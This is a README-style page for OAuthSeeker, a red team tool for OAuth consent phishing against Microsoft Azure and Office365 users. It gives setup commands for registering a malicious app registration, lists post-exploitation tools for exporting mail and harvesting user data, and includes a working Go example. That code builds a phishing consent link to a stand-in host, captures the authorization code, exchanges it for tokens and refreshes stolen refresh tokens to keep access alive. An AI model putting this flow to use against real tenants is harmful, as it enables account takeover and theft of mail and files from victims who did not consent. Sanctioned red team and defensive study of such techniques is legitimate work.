
OAuthSeeker - Red Team OAuth Phishing Tool for Microsoft Azure & Office365

OAuthSeeker is a red team tool for performing phishing attacks using malicious OAuth applications to compromise user identities within Microsoft Azure and Office365.



🚀 Key Features
  • Azure App OAuth Phishing: Perform OAuth phishing attacks targeting Microsoft Azure and Office365 users to gain access to Microsoft Graph API and Microsoft Azure resources.
  • Admin Control Panel: Includes authentication and runs on localhost by default.
  • Token Refresher: Automatically refreshes captured refresh tokens to keep them alive.
  • Custom Skins: Reskin frontend components for different phishing campaigns.
  • LetsEncrypt Integration: Built-in HTTPS support with LetsEncrypt or custom/self-signed certificates.
  • Easy Deployment: Single Go binary with sane defaults for most operations.



⚙️ Quick Start Guide
Code:
git clone https://github.com/praetorian-inc/oauthseeker.git
cd oauthseeker
go build -o oauthseeker ./cmd/oauthseeker/

# Obtain a Microsoft Graph access token for the tenant you are logged into with az.
# It is used only to create the app registration, not for the phishing itself.
export JWT=$(az account get-access-token --resource https://graph.microsoft.com | jq -r .accessToken)

# Register the OAuth application in Azure and install OAuthSeeker as a systemd service.
# $URL is the public redirect URL the consent flow sends victims back to (this host);
# $NAME is the display name of the app registration. Use ./oauthseeker if the binary is not on PATH.
sudo oauthseeker setup --access_token $JWT --azure --redirect_url $URL --name $NAME

# Open the administrative interface (bound to localhost by default)
open http://127.0.0.1:8080/admin/



🔍 Admin Interface
View collected credentials, refresh tokens, and interact with Microsoft Graph API through the built-in GraphRunner interface (OneDrive, SharePoint, Teams, Outlook, etc.).



🎛️ Leveraging Compromised Access Tokens
OAuthSeeker captures access tokens (JWTs) and refresh tokens. Captured refresh tokens are redeemed automatically every 24 hours so the access they grant does not lapse. Use other tools for post-exploitation:
  • GraphRunner: Post-exploitation toolkit for Microsoft 365 (search/export emails, enumerate permissions, persistence, etc.).
  • GraphSpy: Web interface for token management, device code phishing, and data extraction.
  • OAuthAzure: Exchange JWT for Azure impersonation tokens.
  • OAuthPillage: Dump user information for additional phishing campaigns.
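The mechanics behind the phishing link described under Key Features and the token refresher described in this section, as an added example that is not OAuthSeeker's own code: the Microsoft identity platform authorization-code flow from the attacker's side, written in Go because that is the project's language. It builds the consent link, validates the callback, builds the code-exchange and refresh-token request bodies, and decodes the claims of a captured token. The authorize endpoint path is Microsoft's real one; the client ID, redirect URL, secret, authorization code and token values are constructed placeholders, and UnsignedJWT fabricates an unsigned token only so the decoding step runs offline.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Microsoft identity platform v2.0 authorize endpoint; tenant is "common" or a tenant ID.
const authorizeURL = "https://login.microsoftonline.com/%s/oauth2/v2.0/authorize"

// ConsentURL is the link the victim receives. clientID is the attacker's app registration and
// redirectURI must exactly match one registered on it. Without "offline_access" no refresh token is issued.
func ConsentURL(tenant, clientID, redirectURI string, scopes []string, state string) string {
	q := url.Values{}
	q.Set("client_id", clientID)
	q.Set("response_type", "code")
	q.Set("redirect_uri", redirectURI)
	q.Set("scope", strings.Join(scopes, " "))
	q.Set("state", state) // ties the callback to the campaign that sent the link
	return fmt.Sprintf(authorizeURL, tenant) + "?" + q.Encode()
}

// CallbackCode pulls the authorization code out of the redirect the victim's browser makes
// after consenting, rejecting declines (error=access_denied) and state mismatches.
func CallbackCode(callback, expectedState string) (string, error) {
	u, err := url.Parse(callback)
	if err != nil {
		return "", err
	}
	q := u.Query()
	switch {
	case q.Get("error") != "":
		return "", fmt.Errorf("authorize error %s: %s", q.Get("error"), q.Get("error_description"))
	case q.Get("state") != expectedState:
		return "", errors.New("state mismatch")
	case q.Get("code") == "":
		return "", errors.New("callback carries no code")
	}
	return q.Get("code"), nil
}

// TokenForm builds the form body POSTed to .../oauth2/v2.0/token. grant "authorization_code"
// trades the code for an access token plus refresh token; grant "refresh_token" keeps a captured
// refresh token alive. Each refresh reply carries a new refresh token that must replace the stored one.
func TokenForm(clientID, clientSecret, grant, value, redirectURI string, scopes []string) url.Values {
	f := url.Values{"client_id": {clientID}, "client_secret": {clientSecret},
		"grant_type": {grant}, "scope": {strings.Join(scopes, " ")}}
	if grant == "authorization_code" {
		f.Set("code", value)
		f.Set("redirect_uri", redirectURI) // must equal the value used in ConsentURL
	} else {
		f.Set("refresh_token", value)
	}
	return f
}

// TokenClaims are the claims of a captured Graph access token worth triaging.
type TokenClaims struct {
	Aud   string `json:"aud"`   // "https://graph.microsoft.com" for Graph tokens
	Appid string `json:"appid"` // the malicious app's client ID
	Scp   string `json:"scp"`   // delegated permissions actually granted
	Exp   int64  `json:"exp"`   // unix expiry; refresh before this
}

// DecodeClaims reads a JWT payload without checking the signature: the token is inspected, not trusted.
func DecodeClaims(jwt string) (TokenClaims, error) {
	var c TokenClaims
	parts := strings.Split(jwt, ".")
	if len(parts) != 3 {
		return c, errors.New("not a JWT")
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return c, err
	}
	return c, json.Unmarshal(payload, &c)
}

// UnsignedJWT fabricates an unsigned token so the flow runs offline; real tokens are signed by Microsoft.
func UnsignedJWT(c TokenClaims) string {
	hdr := base64.RawURLEncoding.EncodeToString([]byte(`{"alg":"none","typ":"JWT"}`))
	body, _ := json.Marshal(c)
	return hdr + "." + base64.RawURLEncoding.EncodeToString(body) + "."
}

func main() {
	// Constructed sample identifiers, not real ones.
	app, redirect := "11111111-2222-3333-4444-555555555555", "https://phish.example/redirect"
	scopes := []string{"offline_access", "User.Read", "Mail.Read", "Files.Read.All"}
	fmt.Println("send:", ConsentURL("common", app, redirect, scopes, "cmp42"))
	code, _ := CallbackCode(redirect+"?code=0.AXYZ&state=cmp42", "cmp42")
	fmt.Println("exchange:", TokenForm(app, "s3cret", "authorization_code", code, redirect, scopes).Encode())
	fmt.Println("refresh:", TokenForm(app, "s3cret", "refresh_token", "0.RT", "", scopes).Encode())
	c, _ := DecodeClaims(UnsignedJWT(TokenClaims{Aud: "https://graph.microsoft.com", Appid: app, Scp: "User.Read Mail.Read"}))
	fmt.Printf("captured: aud=%s appid=%s scp=%q\n", c.Aud, c.Appid, c.Scp)
}
```

The scope list decides what the consent prompt asks for and what ends up in the token's scp claim; offline_access is what makes a refresh token exist at all, so a campaign that omits it has nothing for the refresher to keep alive. Because every refresh response rotates the refresh token, the refresher has to persist the newest one it received, not the one originally captured. The app ID in the appid claim is the same identifier recorded on the consent grant that defenders review in the Entra ID audit log, which is why the app registration's name and ID are effectively the campaign's fingerprint.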



📚 Documentation
Full setup, configuration, and OpSec guidance available in the repository.
